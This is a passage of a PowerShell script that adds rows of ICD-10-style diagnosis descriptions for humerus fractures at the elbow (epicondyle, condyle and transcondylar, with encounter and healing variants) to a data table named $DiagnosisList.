of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of lateral epicondyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of right humerus","Displaced fracture (avulsion) of medial epicondyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of left humerus","Displaced fracture (avulsion) of medial epicondyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture (avulsion) of medial epicondyle of unspecified humerus","Displaced fracture (avulsion) of medial epicondyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of right humerus","Nondisplaced fracture (avulsion) of medial epicondyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of left humerus","Nondisplaced fracture (avulsion) of medial epicondyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus","Nondisplaced fracture (avulsion) of medial epicondyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of right humerus","Incarcerated fracture (avulsion) of medial epicondyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of left humerus","Incarcerated fracture (avulsion) of medial epicondyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus","Incarcerated fracture (avulsion) of medial epicondyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right humerus","Displaced fracture of lateral condyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left humerus","Displaced fracture of lateral condyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified humerus","Displaced fracture of lateral condyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right humerus","Nondisplaced fracture of lateral condyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left humerus","Nondisplaced fracture of lateral condyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified humerus","Nondisplaced fracture of lateral condyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of right humerus","Displaced fracture of medial condyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of left humerus","Displaced fracture of medial condyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial condyle of unspecified humerus","Displaced fracture of medial condyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of right humerus","Nondisplaced fracture of medial condyle of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of left humerus","Nondisplaced fracture of medial condyle of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial condyle of unspecified humerus","Nondisplaced fracture of medial condyle of unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of right humerus","Displaced transcondylar fracture of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of left humerus","Displaced transcondylar fracture of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced transcondylar fracture of unspecified humerus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced transcondylar fracture of unspecified humerus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced transcondylar fracture of unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transcondylar fracture of unspecified humerus","Displaced 